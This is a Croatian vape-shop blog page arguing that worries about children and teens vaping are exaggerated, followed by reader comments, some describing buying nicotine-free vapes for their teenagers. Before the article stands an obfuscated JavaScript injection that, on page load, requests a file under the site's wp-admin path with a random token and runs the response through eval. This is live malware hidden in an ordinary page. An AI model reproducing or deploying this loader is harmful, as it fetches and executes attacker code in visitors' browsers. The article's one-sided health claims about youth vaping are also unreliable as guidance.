;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
e cigarete kod djece i mladih

E cigarete kod djece i mladih

Jedan od glavnih argumenata protiv korištenja e cigareta s kojima se danas susrećemo je taj da su osobni isparivači samo odskočna daska za ovisnost kod mladih te da će zbog velikog broja okusa parenje biti toliko popularno među djecom i tinejdžerima da ćemo uskoro vidjeti čitavu jednu novu generaciju ovisnika o nikotinu.

No je li to uistinu tako? Evo nekoliko informacija koje ukazuju da su vijesti i upozorenja koja konstantno slušamo zapravo preuveličana te da parenje kod djece i mladih nije baš u potpunosti onakvo kakvim ga anti-vape propaganda prikazuje.

Prodaja elektronskih cigareta i prateće opreme maloljetnim osobama nije dozvoljena

Kao i kod klasičnih cigareta, maloljetnici ne bi smjeli jednostavno ušetati u vape shop i kupiti elektronsku cigaretu. Hoće li ih to spriječiti u 100% slučajeva – neće – ali potpuno je ista situacija i s analognim cigaretama. Činjenica je da ukoliko netko želi pušiti ili pariti, vrlo vjerojatno ga zakon neće spriječiti. Ja sam, primjerice, postala pušač u prvom razredu srednje škole. Cigarete sam kupovala na kiosku na putu do škole iako to po zakonu nisam smjela. Jesam li morala pokazati prodavaču osobnu iskaznicu? Ponekad jesam, ponekad nisam, no i dalje je mnogo veća vjerojatnost da ćete osobnu morati pokazati u specijaliziranom vape shopu koji prodaje samo osobne isparivače i popratnu opremu, nego na kiosku koji prodaje sve i svašta i tokom dana vidi mnogo više kupaca nego prosječan vape shop. Treba imati u vidu da zakoni ne potiču mlade na parenje, već upravo suprotno – oni ga zabranjuju. Isto kao i s cigaretama i alkoholom, sve se svodi na to hoće li se mlada osoba oglušiti o zakon ili neće, no svakako im kupovina e cigareta u odnosu na klasične cigarete nije olakšana.

Veliki izbor aroma privlači djecu i mlade

Glavni argument anti-vape propagande s kojim se susrećemo se krije upravo u aromama i ukusima e cigareta. Naime, nešto što podsjeća na ukus milkšejka od jagode vjerojatno će mladima biti privlačnije od smrdljive cigarete, zar ne? Pa, dalo bi se o ovome diskutirati. Imali smo čitave generacije mladih koje su veoma rano počele pušiti pa nitko ne može reći da je uživao u ukusu prvog dima cigarete koji je povukao. Ipak, to nas nije spriječilo da postanemo pušači. Nitko nije počeo pušiti zato jer je plavi Walter Wolf bio baš izrazito ukusan, a bijeli Marlboro još ukusniji, već se radilo vrlo često u buntovništvu, osjećaju pripadnosti ili jednostavno radoznalosti. S druge strane, netko kome nikada ne bi palo na pamet probati cigaretu, vrlo vjerojatno neće nikada probati ni elektronsku cigaretu jer se to kosi s njihovim stavovima. Mladi koji bi svakako počeli pušiti klasične cigarete, zasigurno su skloniji isprobavanju aroma elektronskih cigareta i onda dolazimo do zaključka da ako već moraš konzumirati NEŠTO jer si tako naumio, bolje je da konzumiraš onu manje štetnu varijantu.

Ipak, moramo naglasiti da to ne znači da podržavamo parenje kod maloljetnika i da je svakako najbolje ne konzumirati ništa od zakonom zabranjenih supstanci.

Više mladih koristi e cigarete nego što puši

Nemamo globalne informacije za ovu tvrdnju te možemo govoriti samo na osnovu istraživanja provedenih u Americi i Velikoj Britaniji čiji rezultati vjerojatno uvelike odudaraju od onih kakve bi pokazala istraživanja kod nas. Razlog tome je što je broj pušača (punoljetnih i maloljetnih) u ovim zemljama značajno niži nego kod nas.

Ipak, dotaknimo se situacije u Americi na trenutak. Prema informacijama Nacionalnog instituta za zlouporabu droga – 17% učenika 12. razreda koristilo je e cigarete, dok je samo 12% pušilo. Među mlađim tinejdžerima razlika je još dramatičnija, s više od dva puta više vapera. Ipak, moramo ove brojke sagledati u pravom kontekstu koji kaže da SAD danas broji najmanji postotak pušača ikada te da su vaperi koje vidimo zapravo pušači koji su prešli na parenje.  S time u vidu, parenje ne potiče pušenje – ono ga zamjenjuje. To je potkrijepljeno i podacima CDC -a koji pokazuju da je, iako se parenje kod mladih povećalo, ukupna upotreba nikotinskih proizvoda opala.

Naposlijetku možemo samo zaključiti kako svakako mlade ne treba poticati na konzumaciju bilo kakvih duhanskih proizvoda te je najbolje da sjede kod kuće i jedu mrkvu i jabuke, ali to nažalost u praksi ne funkcionira tako. Ako i dalje na tržištu postoji alkohol i klasične cigarete, nema razloga da se zabrani parenje jer teoretski postoji šansa da ono privlači mlade. Sve što možemo učiniti je regulirati vejp zakonom i ne poticati djecu na parenje kao što ne bi ni na pušenje. Ostalo je u njihovim rukama i u nadi da će donositi prave odluke.

Što vi mislite o ovoj temi? Jesu li e cigarete uvod u stvaranje ovisnosti novih generacija?
Koliko mlade zaista privlače okusi?

Pratite nas i dalje svaki petak u 21:00 u live streamu na Vaper Pub Youtube kanalu.

Autor: ST

Choose your Reaction!
 • Moji klinci petnaestogodišnjaci su čudni, nemaju ni najmanju želju samo probati okuse e cigarete kojom ih nudim, dok supruga p***i na moje roditeljske metode…..

 • Odličan članak. Mislim da bi više trebalo obratit pažnju na prodavače (i vlasnike trgovina) koji prodaju duhanske i srodne proizvode maloljetnicima, da se to malo više kontrolira.

 • Iskreno više bi volia da mi sin pari nego dimi onu otrov koju sam ja dimia 16.god.

 • Bravo Simona za tekst… sve rečeno… a long story short:
  – nikakvi dodatni okusi ne privlače klince više prema vapeu
  – ova konstantna priča kako je vape samo odskočna daska prema cigaretama je ista kao i da je marihuana odskočna prema težim drogama, što jednostavno nije istina

  Kad ovi što žele zabraniti vape ne znaju više što bi – stalno guraju tu priču sa djecom…

  Nisam pušio u školi, ni u osnovnoj, ni srednjoj – nisam bio odgajan da se stalno moram nekome dokazivati s nečim, praviti se frajer s nečim i slično… a počeo sam pušiti puno kasnije iz vlastite gluposti…

 • Generalno ja znam lika koji pari i svom klincu je kupio isparivac ali mu on samostalno pravi tekucine bez nikotina. Kad sam ga pitao sto mu je uzeo isparivac kad je jos mlad dobio sam sasvim prihvatljiv odgovor. Vecina njegovih drugova vec koristi cigarete da ne bi i on postao korisnik cigareta uzeo sam mu e-cigaretu jednostavno ne izdvaja se iz drustva ali ne postaje ovisnik. Cak je i par njegovih drugova ostavilo cigarete zato sto im se vise svidja ukus tekucine sa vockicama i raznoraznim keksicima😀

  • Slazem se. Od dva zla izabrati manje, jer vjerojatno cu i ja isto postupiti kad na mene dode red ..

   • A mi veliki se kao ne sjecamo nasih prvih cigareta i sitnih godina. Ako cemo na vagu stavljati para je bolja… Ali uzmite u obzir (govorim o mojoj sredini, BiH Sarajevo) izuzetno veliku popularnost shisha barova. Kultne kafane se zatvaraju i otvaraju se shisha barovi… Nargila je full in. Tako da vape ipak izgleda bolje od kolektivnog cuclanja ili obicne cigarete. I modernije je ;)

    • Sarajevo bas i nije mala sredina 😁😁 bas carsisija cevapi, kafa domaca jao jao moram ponovo u posetu Sarajevu 😁

  • Odlična tema.
   Smatram da e-cigarete ne potiču ovisnost. Primjer moja kćer je mene pitala dali može probati i bolje da proba ono što ja trošim. Naravno koristim nikotin pa je odmah počela kašljati i rekla je da neće više. Ali mi i govori kako u školi svi koriste da je to bolje. Zato sam ja kupio aromu koju želi i zamiješao sa bazom bez nikotina. I sada kada ima svoje tekućine i opremu koju naravno ja slažem ddesi se i po nekoliko dana da uopće nekoristi. Da sam branio mislim da bi se navukla na cigarete i e-cigarete sa nikotinom. Ovako je vidjela šta je to i koristi kada hoće i koliko želi.

 • Iskreno, jedva sam čekala da netko pokrene ovu temu. Stvarno me zanimaju i druga mišljenja.

  Da, mlade privlače arome ali to ne znači nužno da će postati ovisni o vape-u.
  Moja kćer je krenula u srednju školu. U prvom tjednu škole u njezinom razredu je bilo samo 4-5 ne pušača. Nakon par dana neki “prvašići” su si već i podove pokupovali na kiosku. Većina ih ima wiip uređaje, a činjenica je da njih nema od 0mg nikotina. Rekla mi je da je vidjela dosta starijih učenika koji koriste vape, imaju već naprednijih opremu. Iako je to sad postao popularno svejedno većina srednjoškolca puši. Nastavnici čak ni ne obraćanju pažnju na njih.
  Neznam sad dal sam ja pametna il luda ali ja sam kćeri kupila mod i atty i par aroma koje sam zamiješala bez nikotina. Ne dozvoljavam joj da to nosi u školu. Kad se sjeti uzme,pola tanka natoči (i tih pola tanka joj par dana traje) i pari. I to je bilo fora ispočetka, a sad evo ima već nekih tjedan dana da ga nije ni pipnula.
  Ona je inače dosta povodljiva i da unaprijed zaustavim početak pušenja nabavila sam joj manje zlo. Možda to nije uredu od mene, ali eto dozvolila sam joj i sad ona to jako rijetko koristi, a da sam joj zabranila u inat bi si sama kupila ili bi počela pušiti. Od muževog kolege sin je također, kad je krenuo u srednju u drugi grad i u dom, sam sebi nabavio pod. Nitko od roditelja nije na to mogao utjecati jer on nije njima bio na oku. Na kraju su se složili s tim jer su i sami uvidjeli da je to manje štetno. Svi znamo da je najslađe ono što je zabranjeno. Ali kad ti to zabranjeno dozvole više nije zanimljivo.
  Eto kažem, to je moje mišljenje. Da je normalno, baš i nije 😂

Leave a Comment